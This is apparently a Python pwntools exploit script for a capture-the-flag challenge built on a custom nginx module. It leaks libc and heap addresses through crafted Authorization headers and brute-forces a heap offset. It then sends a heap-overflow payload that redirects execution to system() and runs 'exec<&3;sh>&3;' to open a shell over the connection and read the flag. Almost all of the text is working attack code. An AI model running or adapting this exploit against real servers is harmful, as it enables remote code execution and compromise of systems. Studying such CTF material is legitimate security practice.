linfo = lambda x, *a: log.info(x, *a)
lwarn = lambda x, *a: log.warn(x, *a)
lerr  = lambda x, *a: log.error(x, *a)
lprog = lambda x, *a: log.progress(x, *a)
lhex  = lambda x, y="leak": linfo(f"{x:#018x} <- {y}")
phex  = lambda x, y="leak": print(f"{x:#018x} <- {y}")

# type manipulation
byt   = lambda x: x if isinstance(x, (bytes, bytearray)) else f"{x}".encode()
rpad  = lambda x, s=8, v=b"\0": x.ljust(s, v)
lpad  = lambda x, s=8, v=b"\0": x.rjust(s, v)
hpad  = lambda x, s=0: f"%0{s if s else ((x.bit_length() // 8) + 1) * 2}x" % x
upad  = lambda x: u64(rpad(x))
cpad  = lambda x, s: byt(x) + cyc(s)[len(byt(x)):]
tob   = lambda x: bytes.fromhex(hpad(x))

# elf aliases
gelf  = lambda elf=None: elf if elf else exe
srh   = lambda x, elf=None: gelf(elf).search(byt(x)).__next__()
sasm  = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).__next__()
lsrh  = lambda x: srh(x, libc)
lasm  = lambda x: sasm(x, libc)

# cyclic aliases
cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

# tube aliases
t   = None
gt  = lambda at=None: at if at else t
sl  = lambda x, t=None, *a, **kw: gt(t).sendline(byt(x), *a, **kw)
se  = lambda x, t=None, *a, **kw: gt(t).send(byt(x), *a, **kw)
ss  = (
        lambda x, s, t=None, *a, **kw: sl(x, t, *a, **kw)
        if len(x) < s
        else se(x, *a, **kw)
          if len(x) == s
          else lerr(f"ss to big: {len(x):#x} > {s:#x}")
      )
sla = lambda x, y, t=None, *a, **kw: gt(t).sendlineafter(
        byt(x), byt(y), *a, **kw
      )
sa  = lambda x, y, t=None, *a, **kw: gt(t).sendafter(byt(x), byt(y), *a, **kw)
sas = (
        lambda x, y, s, t=None, *a, **kw: sla(x, y, t, *a, **kw)
        if len(y) < s
        else sa(x, y, *a, **kw)
          if len(y) == s
          else lerr(f"ss to big: {len(x):#x} > {s:#x}")
      )
ra  = lambda t=None, *a, **kw: gt(t).recvall(*a, **kw)
rl  = lambda t=None, *a, **kw: gt(t).recvline(*a, **kw)
rls = lambda t=None, *a, **kw: rl(t=t, *a, **kw)[:-1]
rcv = lambda x, t=None, *a, **kw: gt(t).recv(x, *a, **kw)
ru  = lambda x, t=None, *a, **kw: gt(t).recvuntil(byt(x), *a, **kw)
it  = lambda t=None, *a, **kw: gt(t).interactive(*a, **kw)
cl  = lambda t=None, *a, **kw: gt(t).close(*a, **kw)


# setup vagd vm
vm = None
def setup():
  global vm
  if args.REMOTE or args.LOCAL:
    return None

  try:
    # only load vagd if needed
    from vagd import Dogd, Box
  except ModuleNotFoundError:
    log.error('Failed to import vagd, run LOCAL/REMOTE or install it')
  if not vm:
    vm = Dogd(BINARY, image=BOX, symbols=True, libs=True, ex=True, fast=True,   
              files=['./nginx.conf'], packages=['zlib1g'], forward={'8080/tcp': 8080})  # Docker
  if vm.is_new:
    # additional setup here
    vm.system('sudo mkdir /nginx').recvall()
    vm.system('sudo chown vagd:sudo /nginx').recvall()
    vm.system('sudo mkdir /challenge').recvall()
    vm.system('sudo chown vagd:sudo /challenge').recvall()
    vm.system('mkdir /nginx/modules /nginx/conf /nginx/logs').recvall()
    vm.system('echo NOT_THE_FLAG > /nginx/flag.txt').recvall()
  else:
    vm.system('pkill nginx').recvall()
    vm.system('rm /challenge/flag.txt').recvall()


  return vm


# get target (pwnlib.tubes.tube)
def get_target(**kw):
  if args.REMOTE:
    # context.log_level = 'debug'
    return remote(IP, PORT)

  if args.LOCAL:
    if args.GDB:
      return gdb.debug([BINARY] + ARGS, env=ENV, gdbscript=GDB, **kw)
    return process([BINARY] + ARGS, env=ENV, **kw)

  return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)


vm = setup()

#===========================================================
#                   EXPLOIT STARTS HERE
#===========================================================
# Arch:       amd64-64-little
# RELRO:      Full RELRO
# Stack:      Canary found
# NX:         NX enabled
# PIE:        PIE enabled
# SHSTK:      Enabled
# IBT:        Enabled
# Stripped:   No
# Comment:    GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0

def build_header(path, method, data=None, cookie=None, data_len=None, headers=None):
  if headers is None:
    headers = list()

  if data and data_len is None:
    data_len = len(data)

  if data_len is not None:
    headers += [f'Content-Length: {data_len}\r\n'.encode()]

  if cookie is not None:
    headers += [f'Cookie: {cookie}\r\n'.encode()]

  return flat(
      byt(method), b' ', byt(path), b' HTTP/1.1\r\n',
      b'Host: ', f'{IP}:{PORT}\r\n'.encode(),
      headers,
      b'\r\n'
    )

libc = ELF('./libs/libc.so.6', checksec=False)


# token = flat(b'Authorization: Bearer ', b64e(b'ornithorhynchus anatinus').encode(), b'\r\n')
token = flat(b'Authorization: Bearer ', b64e(p64(0x6fe1be2)).encode(), b'\r\n')
leak_libc_token = flat(b'Authorization: Bearer ', b64e(b'x').encode(), b'\r\n')
leak_heap_token = flat(b'Authorization: Bearer ', b64e(cyc(0x11)).encode(), b'\r\n')

p = lprog("Brute heap off")
for i in range(0x1000):
  p.status(f"{i}")
  t = get_target()
  if not args.REMOTE:
    s = t
    sleep(3 if args.GDB else .5)
  else: 
    se(build_header('/restart', 'GET', headers=[token]))
    cl()
    sleep(.5)

  t = get_target() if args.REMOTE else remote('localhost', 8080) 

  se(build_header('/party', 'GET', headers=[leak_libc_token]))
  ru(b'invalid: x')
  libc.address = (upad(ru(b'Party', drop=True)) << 8) - 0x204200
  lhex(libc.address, "libc")

  # c 1
  se(build_header('/party', 'GET', headers=[leak_heap_token]))
  ru(b'invalid: ' + cyc(0x11))
  HEAP = (upad(ru(b'Party', drop=True)) << 8)
  HEAP -= (0x9200 if args.LOCAL else 0x9400) if args.REMOTE else 0x8d00
  lhex(HEAP, "heap")

  se(build_header('/party', 'POST', headers=[token]))
  ru(b'\r\n\r\n')

  # cmd = b'cp /nginx/flag.txt /challenge/flag.txt;'
  cmd = b'exec<&3;sh>&3;'

  OFF = 0x9000+0x200*i
  bof = flat({
    0x00: cmd*((0x800//len(cmd))),
    0x800: [libc.sym.system, HEAP + OFF]*0x80,
    0x1010: [
      0x1020, 
      0x1011,
    ],       
    0x1010+0x50: [HEAP + OFF + 0x800]
  }, length=0x1200)

  # c 2 
  se(build_header('/party', 'POST', 
                  headers=[b'Authorization: Bearer ', b64e(bof).encode(), b'\r\n']))
  ru(b'\r\n\r\n')

  se(build_header('/party', 'DELETE', headers=[token]))
  try:
    sl('echo PWN; id; cat /nginx/flag.txt;')
    ru('PWN')
    it()
  except EOFError:
    cl()
    continue


# data = cyc(0x6f)
# for i in range(0x8):
# se(build_header('/party', 'PUT', data, headers=[token]) + data)
# ru(b'\r\n\r\n')


# c 3 
# se(build_header('/party', 'GET', headers=flat(b'Authorization: Bearer ', b64e(cyc(0x1000)).encode(), b'\r\n')))
# ru(b'\r\n\r\n')


t.interactive() # or it()
